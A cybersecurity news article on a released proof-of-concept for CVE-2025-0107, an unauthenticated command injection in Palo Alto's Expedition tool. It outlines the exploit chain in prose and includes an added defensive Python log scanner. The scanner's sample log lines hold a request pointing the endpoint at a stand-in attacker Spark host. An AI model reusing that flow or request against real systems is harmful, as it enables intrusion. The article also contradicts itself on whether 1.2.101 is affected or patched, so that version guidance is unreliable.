Cyber Security News

PoC Exploit Released for Palo Alto Expedition Tool OS Command Injection Vulnerability

A recently disclosed vulnerability in Palo Alto Networks’ Expedition tool has raised significant security concerns, as a proof-of-concept (PoC) exploit has been released for CVE-2025-0107.

This OS command injection vulnerability allows remote attackers to execute arbitrary code on affected systems, posing a severe risk to organizations utilizing the tool.

The flaw, identified as CVE-2025-0107, resides in the /API/regionsDiscovery.php endpoint of the Expedition tool. Exploitation of this vulnerability requires no authentication and enables attackers to trigger a connection to an attacker-controlled Apache Spark server.

The malicious server can then deliver a Java package that is executed by the Expedition server, leading to arbitrary code execution. This vulnerability impacts versions 1.2.101 and earlier of the tool.

The Expedition tool, designed to assist in migrating configurations from third-party firewalls to Palo Alto’s Next-Generation Firewall (NGFW) platform, reached its end-of-life (EoL) on December 31, 2024.


Despite its EoL status, many organizations may still rely on it for critical migration tasks, increasing the urgency of addressing this issue.

Palo Alto Expedition Tool OS Command Injection Vulnerability

The vulnerability stems from insufficient input sanitization in the affected endpoint. By crafting a request with specific parameters, an attacker can cause the tool to execute commands on the underlying operating system. The exploit chain consists of three steps:

  1. Sending a request to the vulnerable endpoint with parameters pointing to a fake Apache Spark server.
  2. The attacker-controlled server responds with a malicious Java payload.
  3. The payload is executed by the Expedition server, granting attackers control over the system.
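A defender-side counterpart to the flow above, added here as an example and not part of the article or of the released PoC: it scans web-server access logs for requests to the /API/regionsDiscovery.php endpoint and escalates those that come from outside the trusted networks or whose parameters point at an outside host. The trusted ranges, the log format and the parameter names in the sample lines (host, port, master) are assumptions, since the article names only the endpoint.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qsl, urlsplit

# Endpoint named in the article; every request to it deserves review.
VULN_ENDPOINT = "/API/regionsDiscovery.php"
# Assumption: networks from which legitimate Expedition use is expected.
TRUSTED_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Apache/Nginx combined log format: client, method, request target, status.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
URL_RE = re.compile(r'\b[a-z][a-z0-9+.-]*://\S+', re.I)

def in_trusted(text):
    try:
        return any(ip_address(text) in net for net in TRUSTED_NETS)
    except ValueError:
        return False

def external_refs(query):
    """Parameter values naming a URL or an IP outside TRUSTED_NETS (all values checked)."""
    refs = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        ips = IPV4_RE.findall(value)
        if URL_RE.search(value) or any(not in_trusted(ip) for ip in ips):
            refs.append(f"{name}={value}")
    return refs

def scan(lines):
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or urlsplit(m["target"]).path != VULN_ENDPOINT:
            continue
        refs = external_refs(urlsplit(m["target"]).query)
        # Escalate when the client is outside trusted ranges or a parameter names an outside host.
        high = bool(refs) or not in_trusted(m["client"])
        findings.append({"client": m["client"], "status": m["status"],
                         "refs": refs, "severity": "high" if high else "info"})
    return findings

# Constructed sample lines; parameter names host/port/master are placeholders.
SAMPLE_LOG = [
    '10.20.30.40 - - [13/Feb/2025:09:01:11 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.20.30.41 - - [13/Feb/2025:09:02:03 +0000] "GET /API/regionsDiscovery.php?project=demo HTTP/1.1" 200 88',
    '203.0.113.7 - - [13/Feb/2025:09:05:27 +0000] "POST /API/regionsDiscovery.php?host=203.0.113.7&port=7077 HTTP/1.1" 200 54',
    '198.51.100.9 - - [13/Feb/2025:09:06:40 +0000] "GET /API/regionsDiscovery.php?master=spark://evil.example:7077 HTTP/1.1" 500 0',
]
```

Calling `scan(SAMPLE_LOG)` returns three findings: the internal request with no outside reference is informational, while the two requests from outside the trusted ranges that carry an outside host are marked high.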

Security researchers have released a PoC exploit demonstrating how attackers can leverage this vulnerability. The PoC includes Python scripts that simulate both the attack and the fake Spark server used to deliver malicious payloads.

Palo Alto Networks has released patches addressing this issue in Expedition version 1.2.101 and later. Users are strongly urged to upgrade their systems immediately and restrict network access to authorized users only.

Mitigation Recommendations

To protect against potential exploitation:

  • Upgrade to Expedition version 1.2.101 or later.
  • Restrict access to the Expedition tool’s interface to trusted networks.
  • Disable unused instances of Expedition if no longer required.
  • Rotate all credentials processed through the tool as a precautionary measure.

The release of a PoC exploit significantly increases the likelihood of attacks targeting this vulnerability. Organizations using outdated versions of the Expedition tool must act swiftly to patch their systems and mitigate risks.

While Palo Alto Networks has retired Expedition, its use in migration processes underscores the importance of securing temporary tools handling sensitive data.


Guru Baran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
